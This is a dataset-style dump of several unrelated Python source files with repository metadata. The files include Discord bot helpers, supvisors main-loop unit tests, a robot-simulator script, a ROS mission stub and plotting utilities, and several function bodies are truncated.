unittest.TextTestRunner(verbosity=2).run(suite)
| 36.727273 | 141 | 0.61448 |
49ad08a13c544d4263d6239603d117433df3bf65 | 53 | py | Python | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 8 | 2015-05-09T17:21:57.000Z | 2020-01-28T06:59:18.000Z | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 4 | 2015-12-29T13:08:01.000Z | 2019-12-27T12:58:04.000Z | src/poliastro/_math/integrate.py | DhruvJ22/poliastro | ac5fafc6d054b2c545e111e5a6aa32259998074a | [
"MIT"
] | 1 | 2016-10-05T08:34:44.000Z | 2016-10-05T08:34:44.000Z | from scipy.integrate import quad
__all__ = ["quad"]
| 13.25 | 32 | 0.735849 |
49ad2866726183e18afb70540beb33954b2be143 | 543 | py | Python | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | null | null | null | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | null | null | null | app/tasks/uwu/uwu.py | tahosa/discord-util-bot | 2f261c5ae06da8a62e72502b53341720437860f5 | [
"MIT"
] | 1 | 2022-02-09T04:16:54.000Z | 2022-02-09T04:16:54.000Z | import logging
import discord
import discord.ext.commands as commands
_LOG = logging.getLogger('discord-util').getChild("uwu")
| 31.941176 | 110 | 0.685083 |
49add70868769fd8f813dafc8912a925207ca004 | 4,011 | py | Python | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | rocket.py | FrCln/SpaceGarbage | 0e121143888b108eac2b86b1dd9fcbf20dcef36e | [
"MIT"
] | null | null | null | import math
import os
from curses_tools import draw_frame, get_frame_size
def _limit(value, min_value, max_value):
"""Limit value by min_value and max_value."""
if value < min_value:
return min_value
if value > max_value:
return max_value
return value
def _apply_acceleration(speed, speed_limit, forward=True):
"""Change speed accelerate or brake according to force direction."""
speed_limit = abs(speed_limit)
speed_fraction = speed / speed_limit
# ,
# ,
delta = math.cos(speed_fraction) * 0.75
if forward:
result_speed = speed + delta
else:
result_speed = speed - delta
result_speed = _limit(result_speed, -speed_limit, speed_limit)
# ,
if abs(result_speed) < 0.1:
result_speed = 0
return result_speed
| 31.335938 | 115 | 0.607828 |
49ae3d28975be04fc1299eea9d4febbbbbb376de | 7,963 | py | Python | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | null | null | null | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | null | null | null | src/roll.py | SimonPerche/PersonalitiesWars | 495803a5be5e9fde572c3f39086d8a3510c75f58 | [
"MIT"
] | 1 | 2022-03-08T22:07:50.000Z | 2022-03-08T22:07:50.000Z | import secrets
import asyncio
from datetime import datetime, timedelta
import discord
from discord.ext import commands
from database import DatabasePersonality, DatabaseDeck
#### Utilities functions ####
def min_until_next_claim(id_server, id_user):
    """Return minutes until next claim (0 if the user can claim now).

    :param id_server: id of the server whose configuration is consulted.
    :param id_user: id of the user whose claim cooldown is checked.
    :return: whole minutes left before the user may claim again.
    """
    last_claim = DatabaseDeck.get().get_last_claim(id_server, id_user)
    time_until_claim = 0
    if last_claim:
        # Per-server cooldown between two claims, in minutes.
        claim_interval = DatabaseDeck.get().get_server_configuration(id_server)['claim_interval']
        date_last_claim = datetime.strptime(last_claim, '%Y-%m-%d %H:%M:%S')
        # Whole minutes elapsed since the last claim (divmod drops the seconds).
        minute_since_last_claim = int(divmod((datetime.now() - date_last_claim).total_seconds(), 60)[0])
        if minute_since_last_claim < claim_interval:
            time_until_claim = claim_interval - minute_since_last_claim
    return time_until_claim
def min_until_next_roll(id_server, id_user):
    """Return minutes until next roll (0 if the user can roll now).

    Rolls are rate-limited per clock hour: the counter is reset when a new
    hour begins, and once the hourly quota is reached the user must wait
    for the top of the next hour.

    :param id_server: id of the server whose roll quota applies.
    :param id_user: id of the user whose roll count is checked.
    :return: 0 if a roll is allowed now, otherwise minutes until the next hour.
    """
    last_roll = DatabaseDeck.get().get_last_roll(id_server, id_user)
    if not last_roll:
        return 0
    last_roll = datetime.strptime(last_roll, '%Y-%m-%d %H:%M:%S')
    now = datetime.now()
    # If a new hour began
    if now.date() != last_roll.date() or (now.date() == last_roll.date() and now.hour != last_roll.hour):
        DatabaseDeck.get().set_nb_rolls(id_server, id_user, 0)
        return 0
    max_rolls = DatabaseDeck.get().get_rolls_per_hour(id_server)
    user_nb_rolls = DatabaseDeck.get().get_nb_rolls(id_server, id_user)
    if user_nb_rolls < max_rolls:
        return 0
    else:
        # Quota exhausted for this hour: wait until the next hour starts.
        return 60 - now.minute
| 41.259067 | 154 | 0.615346 |
49ae4cab0439ba556dfe9b168c615e0466cf0551 | 2,195 | py | Python | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 1 | 2020-04-16T18:06:13.000Z | 2020-04-16T18:06:13.000Z | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 3 | 2019-05-11T20:39:31.000Z | 2019-11-13T10:51:59.000Z | test.py | mltnhm/sr-turtle | d839eeb50e4ba70cfc2a4070c9f6fda2f0b19ca2 | [
"MIT"
] | 1 | 2019-11-12T08:02:52.000Z | 2019-11-12T08:02:52.000Z | from __future__ import print_function
import time
from sr.robot import *
SEARCHING = "SEARCHING"
DRIVING = "DRIVING"
R = Robot()
state = SEARCHING
while True:
if state == SEARCHING:
print("Searching for gold tokens...")
tokens = get_gold_tokens()
print(tokens)
if len(tokens) > 0:
m = tokens[0]
# TODO: Pick the closest token, not just any token.
print("Token sighted. {0} is {1}m away, bearing {2} degrees." \
.format(m.info.offset, m.dist, m.rot_y))
state = DRIVING
else:
print("Can't see anything.")
turn(25, 0.3)
time.sleep(0.2)
elif state == DRIVING:
print("Aligning...")
tokens = get_gold_tokens()
if len(tokens) == 0:
state = SEARCHING
else:
m = tokens[0]
if m.dist < 0.4:
print("Found it!")
if R.grab():
print("Gotcha!")
turn(50, 0.5)
drive(50, 1)
R.release()
drive(-50, 0.5)
else:
print("Aww, I'm not close enough.")
exit()
elif -15 <= m.rot_y <= 15:
print("Ah, that'll do.")
drive(50, 0.5)
elif m.rot_y < -15:
print("Left a bit...")
turn(-12.5, 0.5)
elif m.rot_y > 15:
print("Right a bit...")
turn(12.5, 0.5)
| 25.229885 | 75 | 0.491116 |
49aebc3c829e124d35af1e1fc14ed2a19ad3ba06 | 9,218 | py | Python | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
] | null | null | null | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
] | null | null | null | ATIVIDAS UF/exemplos.py | alverad-katsuro/Python | 6ba3cc604fd9cde3ee012fcf17bbf6cd944e8c38 | [
"MIT"
] | null | null | null | from math import log
| 43.895238 | 129 | 0.653179 |
49af0bc491e51d1946b18c865a7ad51bc62f12c7 | 15,786 | py | Python | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 66 | 2017-01-05T11:28:34.000Z | 2022-03-04T08:42:01.000Z | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 36 | 2016-12-30T10:46:58.000Z | 2022-01-09T22:56:10.000Z | supvisors/tests/test_mainloop.py | julien6387/supvisors | 4e32bce566dec2cf9e9a213a3698178030eb869b | [
"Apache-2.0"
] | 12 | 2017-03-04T04:53:51.000Z | 2022-01-28T13:03:22.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# ======================================================================
# Copyright 2017 Julien LE CLEACH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================================================
import pytest
from supvisors.mainloop import *
from supvisors.ttypes import AddressStates
from supvisors.utils import DeferredRequestHeaders
from threading import Thread
from unittest.mock import call, patch, Mock, DEFAULT
from .base import DummyRpcInterface
def test_creation(supvisors, mocked_rpc, main_loop):
""" Test the values set at construction. """
assert isinstance(main_loop, Thread)
assert main_loop.supvisors is supvisors
assert not main_loop.stop_event.is_set()
assert main_loop.env == {'SUPERVISOR_SERVER_URL': 'http://127.0.0.1:65000',
'SUPERVISOR_USERNAME': '',
'SUPERVISOR_PASSWORD': ''}
assert mocked_rpc.call_args_list == [call('localhost', main_loop.env)]
def test_stopping(mocked_rpc, main_loop):
""" Test the get_loop method. """
assert not main_loop.stopping()
main_loop.stop_event.set()
assert main_loop.stopping()
def test_stop(mocker, mocked_rpc, main_loop):
""" Test the stopping of the main loop thread. """
mocked_join = mocker.patch.object(main_loop, 'join')
# try to stop main loop before it is started
main_loop.stop()
assert not main_loop.stop_event.is_set()
assert not mocked_join.called
# stop main loop when alive
mocker.patch.object(main_loop, 'is_alive', return_value=True)
main_loop.stop()
assert main_loop.stop_event.is_set()
assert mocked_join.call_count == 1
def test_run(mocker, main_loop):
    """ Check one iteration of the main loop thread. """
    evt_mock = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.check_events')
    req_mock = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.check_requests')
    poll_mock = mocker.patch('supvisors.supvisorszmq.SupvisorsZmq.poll')
    # let the loop execute exactly one iteration before stopping
    mocker.patch.object(main_loop, 'stopping', side_effect=[False, False, True])
    main_loop.run()
    # one poll, followed by one processing pass of events and of requests
    # (NB: the original comments had check_events/check_requests swapped)
    assert poll_mock.call_args_list == [call()]
    assert evt_mock.call_count == 1
    assert req_mock.call_count == 1
def test_check_events(mocker, main_loop):
    """ Check the dispatching of the events read from the subscriber socket. """
    send_mock = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_remote_comm_event')
    socks = Mock(**{'check_subscriber.return_value': None})
    # nothing read from the socket: no event is forwarded
    main_loop.check_events(socks, 'poll result')
    assert socks.check_subscriber.call_args_list == [call('poll result')]
    assert not send_mock.called
    socks.check_subscriber.reset_mock()
    # a message read from the socket is forwarded (JSON-encoded, hence the quotes)
    socks.check_subscriber.return_value = 'a message'
    main_loop.check_events(socks, 'poll result')
    assert socks.check_subscriber.call_args_list == [call('poll result')]
    assert send_mock.call_args_list == [call('event', '"a message"')]
def test_check_requests(mocker, main_loop):
    """ Check the dispatching of the requests read from the puller socket. """
    send_mock = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_request')
    socks = Mock(**{'check_puller.return_value': None})
    # nothing read from the socket: no disconnection, no request forwarded
    main_loop.check_requests(socks, 'poll result')
    assert socks.check_puller.call_args_list == [call('poll result')]
    assert not socks.disconnect_subscriber.called
    assert not send_mock.called
    socks.check_puller.reset_mock()
    # an ISOLATE_NODES header only disconnects the subscriber
    socks.check_puller.return_value = DeferredRequestHeaders.ISOLATE_NODES, 'a message'
    main_loop.check_requests(socks, 'poll result')
    assert socks.check_puller.call_args_list == [call('poll result')]
    assert socks.disconnect_subscriber.call_args_list == [call('a message')]
    assert not send_mock.called
    socks.check_puller.reset_mock()
    socks.disconnect_subscriber.reset_mock()
    # any other header is forwarded as a deferred request
    socks.check_puller.return_value = 'event', 'a message'
    main_loop.check_requests(socks, 'poll result')
    assert socks.check_puller.call_args_list == [call('poll result')]
    assert not socks.disconnect_subscriber.called
    assert send_mock.call_args_list == [call('event', 'a message')]
def test_check_node(mocker, mocked_rpc, main_loop):
    """ Test the protocol to get the processes handled by a remote Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    mocked_evt = mocker.patch('supvisors.mainloop.SupvisorsMainLoop.send_remote_comm_event')
    # test rpc error: no event is sent to local Supervisor
    # (two proxy creation attempts are expected on failure)
    mocked_rpc.side_effect = ValueError
    main_loop.check_node('10.0.0.1')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert mocked_evt.call_count == 0
    # test with a mocked rpc interface
    # dummy process info returned by the remote supvisors interface
    dummy_info = [{'name': 'proc', 'group': 'appli', 'state': 10, 'start': 5,
                   'now': 10, 'pid': 1234, 'spawnerr': ''}]
    rpc_intf = DummyRpcInterface()
    mocked_all = rpc_intf.supervisor.getAllProcessInfo = Mock()
    mocked_local = rpc_intf.supvisors.get_all_local_process_info = Mock(return_value=dummy_info)
    mocked_addr = rpc_intf.supvisors.get_address_info = Mock()
    rpc_intf.supvisors.get_master_address = Mock(return_value='10.0.0.5')
    rpc_intf.supvisors.get_supvisors_state = Mock(return_value={'statename': 'RUNNING'})
    mocked_rpc.return_value = rpc_intf
    mocked_rpc.side_effect = None
    mocked_rpc.reset_mock()
    # test with address in isolation:
    # an 'auth' event with authorized:False is sent and no process info is requested
    for state in [AddressStates.ISOLATING, AddressStates.ISOLATED]:
        mocked_addr.return_value = {'statecode': state}
        main_loop.check_node('10.0.0.1')
        assert mocked_rpc.call_args_list == [call('10.0.0.1', main_loop.env)]
        expected = 'node_name:10.0.0.1 authorized:False master_node_name:10.0.0.5 supvisors_state:RUNNING'
        assert mocked_evt.call_args_list == [call('auth', expected)]
        assert not mocked_all.called
        # reset counters
        mocked_evt.reset_mock()
        mocked_rpc.reset_mock()
    # test with address not in isolation:
    # two events are sent (presumably authorization + process info — verify against
    # SupvisorsMainLoop.check_node) and local process info is fetched exactly once
    for state in [AddressStates.UNKNOWN, AddressStates.CHECKING, AddressStates.RUNNING, AddressStates.SILENT]:
        mocked_addr.return_value = {'statecode': state}
        main_loop.check_node('10.0.0.1')
        assert mocked_rpc.call_count == 1
        assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
        assert mocked_evt.call_count == 2
        assert mocked_local.call_count == 1
        # reset counters
        mocked_evt.reset_mock()
        mocked_local.reset_mock()
        mocked_rpc.reset_mock()
def test_start_process(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to start a process on a remote Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = KeyError
    main_loop.start_process('10.0.0.1', 'dummy_process', 'extra args')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: start_args is called on the remote supvisors interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    start_mock = mocker.patch.object(dummy_intf.supvisors, 'start_args')
    main_loop.start_process('10.0.0.1', 'dummy_process', 'extra args')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert start_mock.call_args_list == [call('dummy_process', 'extra args', False)]
def test_stop_process(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to stop a process on a remote Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = ConnectionResetError
    main_loop.stop_process('10.0.0.1', 'dummy_process')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: stopProcess is called on the remote supervisor interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    stop_mock = mocker.patch.object(dummy_intf.supervisor, 'stopProcess')
    main_loop.stop_process('10.0.0.1', 'dummy_process')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert stop_mock.call_args_list == [call('dummy_process', False)]
def test_restart(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to restart a remote Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = OSError
    main_loop.restart('10.0.0.1')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: restart is called on the remote supervisor interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    restart_mock = mocker.patch.object(dummy_intf.supervisor, 'restart')
    main_loop.restart('10.0.0.1')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert restart_mock.call_args_list == [call()]
def test_shutdown(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to shut down a remote Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = RPCError(12)
    main_loop.shutdown('10.0.0.1')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: shutdown is called on the remote supervisor interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    shutdown_mock = mocker.patch.object(dummy_intf.supervisor, 'shutdown')
    main_loop.shutdown('10.0.0.1')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert shutdown_mock.call_args_list == [call()]
def test_restart_all(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to restart Supvisors. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = OSError
    main_loop.restart_all('10.0.0.1')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: restart is called on the remote supvisors interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    restart_mock = mocker.patch.object(dummy_intf.supvisors, 'restart')
    main_loop.restart_all('10.0.0.1')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert restart_mock.call_args_list == [call()]
def test_shutdown_all(mocker, mocked_rpc, main_loop):
    """ Check the XML-RPC protocol used to shut down Supvisors. """
    mocker.patch('supvisors.mainloop.stderr')
    # a proxy failure is swallowed: only the connection attempts are visible
    mocked_rpc.side_effect = RPCError(12)
    main_loop.shutdown_all('10.0.0.1')
    assert mocked_rpc.call_count == 2
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    # nominal case: shutdown is called on the remote supvisors interface
    dummy_intf = DummyRpcInterface()
    mocked_rpc.side_effect, mocked_rpc.return_value = None, dummy_intf
    shutdown_mock = mocker.patch.object(dummy_intf.supvisors, 'shutdown')
    main_loop.shutdown_all('10.0.0.1')
    assert mocked_rpc.call_count == 3
    assert mocked_rpc.call_args == call('10.0.0.1', main_loop.env)
    assert shutdown_mock.call_args_list == [call()]
def test_comm_event(mocker, mocked_rpc, main_loop):
    """ Check the notification of a remote communication event to the local Supervisor. """
    mocker.patch('supvisors.mainloop.stderr')
    # an XML-RPC failure is swallowed silently
    mocker.patch.object(main_loop.proxy.supervisor, 'sendRemoteCommEvent', side_effect=RPCError(100))
    main_loop.send_remote_comm_event('event type', 'event data')
    # nominal case: the event is forwarded to the local Supervisor
    send_mock = mocker.patch.object(main_loop.proxy.supervisor, 'sendRemoteCommEvent')
    main_loop.send_remote_comm_event('event type', 'event data')
    assert send_mock.call_args_list == [call('event type', 'event data')]
def check_call(main_loop, mocked_loop, method_name, request, args):
    """ Send one deferred request through the main loop and verify that only the
    expected handler was invoked, once, with the forwarded arguments. """
    main_loop.send_request(request.value, args)
    for name, handler_mock in mocked_loop.items():
        if name != method_name:
            # every other handler must stay untouched
            assert not handler_mock.called
        else:
            # the targeted handler ran exactly once with the forwarded arguments
            assert handler_mock.call_args_list == [call(*args)]
            handler_mock.reset_mock()
def test_send_request(mocker, main_loop):
    """ Check the dispatching of all deferred Supervisor requests to their handlers. """
    # patch every handler of the main loop at once
    handler_mocks = mocker.patch.multiple(main_loop, check_node=DEFAULT,
                                          start_process=DEFAULT, stop_process=DEFAULT,
                                          restart=DEFAULT, shutdown=DEFAULT,
                                          restart_all=DEFAULT, shutdown_all=DEFAULT)
    # each deferred request header must be routed to its own handler with its arguments
    # (NB: includes shutdown_all, which the original comment mislabelled as shutdown)
    expectations = [('check_node', DeferredRequestHeaders.CHECK_NODE, ('10.0.0.2',)),
                    ('start_process', DeferredRequestHeaders.START_PROCESS,
                     ('10.0.0.2', 'dummy_process', 'extra args')),
                    ('stop_process', DeferredRequestHeaders.STOP_PROCESS,
                     ('10.0.0.2', 'dummy_process')),
                    ('restart', DeferredRequestHeaders.RESTART, ('10.0.0.2',)),
                    ('shutdown', DeferredRequestHeaders.SHUTDOWN, ('10.0.0.2',)),
                    ('restart_all', DeferredRequestHeaders.RESTART_ALL, ('10.0.0.2',)),
                    ('shutdown_all', DeferredRequestHeaders.SHUTDOWN_ALL, ('10.0.0.2',))]
    for method_name, header, args in expectations:
        check_call(main_loop, handler_mocks, method_name, header, args)
| 43.607735 | 110 | 0.705752 |
49afc71691a68c9b40e3421c08e29b8368b54b60 | 2,815 | py | Python | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | null | null | null | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | null | null | null | wolf_control/scripts/mission.py | ncsurobotics/SW8S-ROS | 9f7f5811fe1a1a8d5d0de0b791ce757fcaeb5759 | [
"MIT"
] | 1 | 2022-03-30T19:12:52.000Z | 2022-03-30T19:12:52.000Z | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, TransformStamped
from std_msgs.msg import String
from enum import Enum
import tf2_ros
import math
if __name__ == '__main__':
    try:
        # run the mission entry point (defined elsewhere in this file)
        mission()
    except rospy.ROSInterruptException:
        # raised by rospy when the node is shut down (e.g. Ctrl-C); exit quietly
        pass
| 38.040541 | 105 | 0.596448 |
49b0052d2675e4f9dc69452f3b5d084691e4a664 | 19,202 | py | Python | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 8 | 2017-02-27T08:58:08.000Z | 2020-05-25T14:37:24.000Z | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 263 | 2016-11-17T15:02:26.000Z | 2022-03-31T10:04:09.000Z | tests/tests/test_api_management.py | MaciejTe/useradm | 4962000db94bc7d9e80b81c4389f6f769d0d062a | [
"Apache-2.0"
] | 25 | 2016-11-16T15:45:38.000Z | 2020-12-19T09:56:16.000Z | #!/usr/bin/python
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from common import (
init_users,
init_users_f,
init_users_mt,
init_users_mt_f,
cli,
api_client_mgmt,
mongo,
make_auth,
)
import bravado
import pytest
import tenantadm
| 38.327345 | 86 | 0.672638 |
49b03158777693b6348d205c910ad771b55e53ea | 1,167 | py | Python | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | 1 | 2019-10-29T12:33:57.000Z | 2019-10-29T12:33:57.000Z | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | scripts/convert_to_bed.py | Lila14/multimds | e54642e0ae47592321352f931f534881ca57d888 | [
"MIT"
] | null | null | null | import os
# map each bin id to its "chrom<TAB>start<TAB>end" location string
chrom_bins = {}
with open("GSE88952_Sc_Su.32000.bed") as in_file:
    for line in in_file:
        fields = line.strip().split()
        chrom_bins[fields[3]] = "{}\t{}\t{}".format(fields[0], fields[1], fields[2])

def _matrix_to_bed(matrix_path, bed_path):
    """ Convert one sparse contact matrix file to a bed-pair file.

    Each matrix line is whitespace-separated as (bin1, bin2, ?, count); zero-count
    entries are skipped, the others are written as "loc1<TAB>loc2<TAB>count".
    """
    # 'with' guarantees both files are closed even on error
    with open(bed_path, "w") as out_file, open(matrix_path) as in_file:
        for line in in_file:
            fields = line.strip().split()
            if float(fields[3]) != 0:
                out_file.write("\t".join((chrom_bins[fields[0]], chrom_bins[fields[1]], fields[3])))
                out_file.write("\n")

# regenerate each output only when missing (the conversion is deterministic);
# the two conversions previously duplicated the same loop body inline
if not os.path.isfile("ctrl_32kb.bed"):
    _matrix_to_bed("ctrl_32kb_matrix.txt", "ctrl_32kb.bed")
if not os.path.isfile("galactose_32kb.bed"):
    _matrix_to_bed("galactose_32kb_matrix.txt", "galactose_32kb.bed")
49b1fd488e00bd5cbf7211a994c7ac528083422a | 21,956 | py | Python | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | 31 | 2020-03-05T12:27:21.000Z | 2022-03-07T04:00:18.000Z | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | null | null | null | xinshuo_visualization/prob_stat_vis.py | xinshuoweng/Xinshuo_PyToolbox | ce4cf0398f24c5a611af9d94dc0bf2a9104a3716 | [
"MIT"
] | 12 | 2020-07-06T05:06:58.000Z | 2021-11-18T14:43:20.000Z | # Author: Xinshuo Weng
# email: xinshuo.weng@gmail.com
import matplotlib.pyplot as plt, numpy as np
# import seaborn as sns
# from pandas import DataFrame
# from sklearn.neighbors import NearestNeighbors
from terminaltables import AsciiTable
from collections import Counter
from .private import save_vis_close_helper, get_fig_ax_helper
from xinshuo_miscellaneous import isdict, islogical, is_path_exists, isscalar, islist, is_path_exists_or_creatable, CHECK_EQ_LIST_UNORDERED, isnparray, isinteger, isstring, scalarlist2strlist, islistoflist, iscolorimage_dimension, isgrayimage_dimension, istuple
from xinshuo_math import calculate_truncated_mse
# color cycle used when several curves/methods are drawn on the same figure
color_set = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w', 'lime', 'cyan', 'aqua']
# line style cycle, combined with color_set to distinguish many curves
linestyle_set = ['-', '--', '-.', ':', None, ' ', 'solid', 'dashed']
# dots per inch used to convert pixel dimensions into matplotlib figure sizes
dpi = 80
def visualize_ced(normed_mean_error_dict, error_threshold, normalized=True, truncated_list=None, display2terminal=True, display_list=None, title='2D PCK curve', debug=True, vis=False, pck_savepath=None, table_savepath=None, closefig=True):
    '''
    visualize the cumulative error distribution curve (also called NME or PCK curve)
    all parameters are represented by percentage

    parameters:
        normed_mean_error_dict:     dictionary mapping a method name to a (N, ) numpy array of per-sample errors
        error_threshold:            upper bound displayed on the x axis (a percentage when normalized)
        normalized:                 if True, errors are percentages of a normalization factor
        truncated_list:             optional list of thresholds for truncated MSE metrics
        display_list:               optional ordered list of method names controlling curve/table order
        pck_savepath/table_savepath: optional paths to save the curve figure and the metrics table

    returns:
        metrics_dict:               per-method dict with 'AUC' (bigger is better) and 'MSE' (smaller is better)
        metrics_table:              rows of the ascii table that was printed/saved (header row first)
    '''
    if debug:
        assert isdict(normed_mean_error_dict), 'the input normalized mean error dictionary is not correct'
        assert islogical(normalized), 'the normalization flag should be logical'
        if normalized: assert error_threshold > 0 and error_threshold < 100, 'threshold percentage is not well set'
        # bugfix: the original tested an undefined name 'save' (NameError whenever debug
        # was True); the save paths are now validated directly when provided
        if pck_savepath is not None:
            assert is_path_exists_or_creatable(pck_savepath), 'please provide a valid path to save the pck results'
        if table_savepath is not None:
            assert is_path_exists_or_creatable(table_savepath), 'please provide a valid path to save the table results'
        assert isstring(title), 'title is not correct'
        # bugfix: islistofscalar was referenced but never imported; check with isscalar instead
        if truncated_list is not None:
            assert islist(truncated_list) and all(isscalar(v) for v in truncated_list), 'the input truncated list is not correct'
        if display_list is not None:
            assert islist(display_list) and len(display_list) == len(normed_mean_error_dict), 'the input display list is not correct'
            assert CHECK_EQ_LIST_UNORDERED(display_list, list(normed_mean_error_dict.keys()), debug=debug), 'the input display list does not match the error dictionary key list'
    # bugfix: the default display order was only assigned inside the debug branch,
    # so display_list stayed None (and crashed below) when debug was False;
    # also materialize as a list, dict views are not indexable in python 3
    if display_list is None: display_list = list(normed_mean_error_dict.keys())

    # set display parameters
    width, height = 1000, 800
    legend_fontsize = 10
    scale_distance = 48.8           # conversion factor from error unit to micrometers in the legend
    line_index, color_index = 0, 0

    figsize = width / float(dpi), height / float(dpi)
    fig = plt.figure(figsize=figsize)

    # set figure handle
    num_bins = 1000
    if normalized:
        maximum_x = 1
        scale = num_bins / 100
    else:
